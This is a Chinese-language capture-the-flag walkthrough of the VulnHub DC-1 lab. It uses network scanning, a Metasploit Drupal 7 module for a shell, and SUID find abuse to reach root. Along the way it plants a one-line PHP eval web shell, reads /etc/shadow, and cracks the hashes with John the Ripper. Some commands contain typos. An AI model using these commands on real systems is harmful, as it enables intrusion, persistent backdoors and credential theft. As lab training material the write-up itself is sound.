鏡像下載地址
https://www.vulnhub.com/entry/dc-1-1,292/
信息收集
1、可以使用netdiscover -i eth0 發現二層網絡信息
發現兩個設備(103是真實機)。其中105為目標機器。
2、端口發現
Nmap -A 192.168.1.105
發現三個端口 22 80 111
80為http則直接瀏覽器訪問
3、web指紋發現
發現Drupal 版本為 7
准備web滲透
因為7版本存在漏洞 而且在msf中也有
Drupal漏洞
在網上找了一圈沒找到可getshell的exp,因為msf里面有集成cms的利用模塊,所以使用msf進行getshell,用search命令搜索,發現7個漏洞模塊,這里我隨便選擇了一個(use 2)
Show option 只需要填寫RHOSTS
Set RHOSTS 192.168.1.105
Run
獲取shell與與提權
因為僅僅是一個session 所以無法whoami 直接使用getuid
提權方法--查找具有root權限的命令進行提權
發現是 www-data用戶。那么就需要提權
首先需要有session切換成shell
然后查找具有suid的文件,讓這些文件來執行命令進行提權
Find / -perm -u=s -ype f 2>dev.null
發現find命令具有root權限,那就touch一個1 用find提權
使用find 1 -exec ‘/bin/sh’ \; 進入高權限shell
然后再寫個一句話木馬方便鏈接
find 1 -exec echo '<?php eval($_GET[a]);'>123.php \;
這里使用單引號包含需要寫入的內容。放置$_GET被轉義
重新寫下find 1 -exec echo '<?php eval($_POST[a]);'>123.php \;
內網信息獲取
1、百度查找該CMS配置,可以找到配置文件路徑。發現如下信息
2、這個不用看,數據庫肯定不能遠程鏈接, 直接蟻劍鏈接數據庫
登陸即可產看到flag3
3、密碼獲取
cat /etc/shadow
使用join爆破一下
find /etc/shadow -exec cat {} ;>all,txt 導入到當前txt中,用蟻劍下載下來
john --wordlist=/usr/share/john/password.lst --rules all.txt 使用johun爆破一下password.list為默認密碼
登陸之后更目錄下獲取flag4
根據提示使用find flag4.txt -exec ‘/bin/sh’ ;切換到root權限
根據提示進入/root
發現最后的flag